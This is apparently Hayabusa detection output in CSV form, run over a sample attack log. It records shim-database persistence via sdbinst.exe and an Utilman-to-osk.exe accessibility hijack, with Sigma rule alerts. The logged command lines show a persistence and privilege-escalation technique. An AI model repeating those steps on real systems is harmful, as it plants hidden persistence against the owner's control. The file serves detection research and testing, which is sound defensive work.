2019-03-20 05:47:56.436 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\cmd.exe | Process: C:\Windows\Explorer.EXE | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{4f02f780-dd6c-40e3-ab21-c1336815b4db}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.459 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.509 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.559 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3612 | PGUID: 365ABB72-55A1-5C91-0000-00102D930700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2368 | PGUID: 365ABB72-55A1-5C91-0000-0010D6960700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.930 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3004 | PGUID: 365ABB72-55A4-5C91-0000-00103DA60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.807 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{d2c22380-b7b0-4d3a-b36e-bb0e804c265c}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.807 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.807 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.867 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.978 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3908 | PGUID: 365ABB72-55D7-5C91-0000-0010DDC30700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3648 | PGUID: 365ABB72-55D8-5C91-0000-001060C90700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:28.168 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4024 | PGUID: 365ABB72-55DB-5C91-0000-001094D60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.802 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{bebe1bf6-4a2e-46ad-9266-3fbf73d269a4}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.802 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.802 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.832 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.972 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2108 | PGUID: 365ABB72-55E8-5C91-0000-0010AEE50700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2104 | PGUID: 365ABB72-55E9-5C91-0000-00102EEB0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:45.172 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2568 | PGUID: 365ABB72-55EB-5C91-0000-001076F60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 612 | PGUID: 365ABB72-5638-5C91-0000-0010651A0800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.953 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{7146b11e-ec78-4046-b854-9c9bdc68691e}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.953 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.953 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.983 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.104 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4012 | PGUID: 365ABB72-568A-5C91-0000-0010A6450800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.364 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4072 | PGUID: 365ABB72-568A-5C91-0000-0010D24B0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
